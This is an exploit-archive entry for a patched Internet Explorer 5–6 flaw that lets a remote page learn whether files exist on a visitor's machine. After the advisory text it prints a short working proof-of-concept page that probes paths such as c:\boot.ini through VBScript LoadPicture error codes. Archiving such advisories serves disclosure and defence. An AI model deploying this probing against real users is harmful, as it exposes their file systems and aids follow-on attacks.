Microsoft Internet Explorer File Enumeration Vulnerability

vendor:

Internet Explorer

by:

SecurityFocus

7.5

CVSS

HIGH

File Enumeration

200

CWE

Product Name: Internet Explorer

Affected Version From: Internet Explorer 5.0

Affected Version To: Internet Explorer 6.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2002

Microsoft Internet Explorer File Enumeration Vulnerability

Microsoft Internet Explorer is prone to an issue that may permit a remote site to enumerate the existence of files on the client system. This may be exploited via abuse of the VBScript LoadPicture method. Exploitation of the weakness may assist in other attacks which depend on the attacker being able to determine whether or not certain files on the system exist.

Mitigation:

Ensure that the latest version of Internet Explorer is installed and that all security patches are applied.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9611/info

Microsoft Internet Explorer is prone to an issue that may permit a remote site to enumerate the existence of files on the client system. 

This may be exploited via abuse of the VBScript LoadPicture method. Exploitation of the weakness may assist in other attacks which depend on the attacker being able to determine whether or not certain files on the system exist.

<form onsubmit="doIt(this);return false">
<input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>

<script language="vbscript">

Sub loadIt(filename)
LoadPicture(filename)
End Sub

</script>

<script language="javascript">

function doIt(form) {

try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}

if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>